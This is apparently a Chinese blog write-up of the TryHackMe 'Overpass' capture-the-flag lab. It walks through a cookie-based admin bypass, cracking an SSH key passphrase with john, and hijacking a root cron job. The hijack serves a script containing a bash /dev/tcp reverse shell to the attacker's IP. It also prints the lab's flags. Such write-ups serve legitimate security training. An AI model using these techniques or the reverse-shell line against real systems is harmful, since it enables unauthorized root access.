TryHackMe-Overpass

Sugobet

已于 2023-01-15 14:24:06 修改

阅读量169

点赞数

分类专栏：我的网络安全之旅-TryHackMe 文章标签： linux 网络安全安全 web安全

于 2022-12-23 10:02:17 首次发布

本文链接：https://blog.csdn.net/qq_54704239/article/details/128405606

版权

我的网络安全之旅-TryHackMe 专栏收录该内容

154 篇文章 73 订阅

订阅专栏

Overpass

循例，nmap扫一波

开了22和80

gobuster扫一波web，扫到/admin

查看一下源代码，发现了login.js和cookie.js

在文件里面找到了

const statusOrCookie = await response.text()

if (statusOrCookie === "Incorrect credentials") {

    loginStatus.textContent = "Incorrect Credentials"

    passwordBox.value=""

} else {

    Cookies.set("SessionToken",statusOrCookie)

    window.location = "/admin"

}

这段代码很简单，只要我们携带了SessionToken，不管这个值是什么，都可以

携带之后，再次访问：

<div class="bodyFlexContainer content">

    <div>

        <p>Since you keep forgetting your password, James, I've set up SSH keys for you.</p>

        <p>If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.<br>

            Also, we really need to talk about this "Military Grade" encryption. - Paradox

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,
.....

得到了一个ssh密钥和用户名james

使用ssh2john为密钥生成hash

┌──(root💀kali)-[/home/sugobet]
└─# ssh2john ./test1.txt > ./hash

john爆破

┌──(root💀kali)-[/home/sugobet]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash                 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
james13          (./test1.txt)

修改密钥文件的权限为600并登录ssh

┌──(root💀kali)-[/home/sugobet]
└─# chmod 600 ./test1.txt                                                                                              
┌──(root💀kali)-[/home/sugobet]
└─# ssh james@10.10.251.61 -i ./test1.txt
Enter passphrase for key './test1.txt':

james@overpass-prod:~$ cat ./user.txt 
thm{65c1aaf000506e56996822c6281e6bf7}

cat /etc/crontab有一条root的任务：

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

我们可以修改/etc/hosts将ip改为我们攻击机的ip并开启服务

攻击机：

┌──(root💀kali)-[/home/sugobet]
└─# mkdir ./downloads/                                                      1 ⨯
                                                                                
┌──(root💀kali)-[/home/sugobet]
└─# mkdir ./downloads/src 
                                                                                
┌──(root💀kali)-[/home/sugobet]
└─# touch ./downloads/src/buildscript.sh

buildscript.sh内容：

#!/bin/bash
bash -i >& /dev/tcp/10.11.17.14/8888 0>&1

python3 -m http.server 80

静等一分钟：

Ncat: Connection from 10.10.251.61.
Ncat: Connection from 10.10.251.61:53498.
bash: cannot set terminal process group (2654): Inappropriate ioctl for device
bash: no job control in this shell
root@overpass-prod:~# 
root@overpass-prod:~# cat /root/root.txt
cat /root/root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}

另外我发现ubuntu版本是18.04，并且gcc正常，有可能存在CVE-2021-3493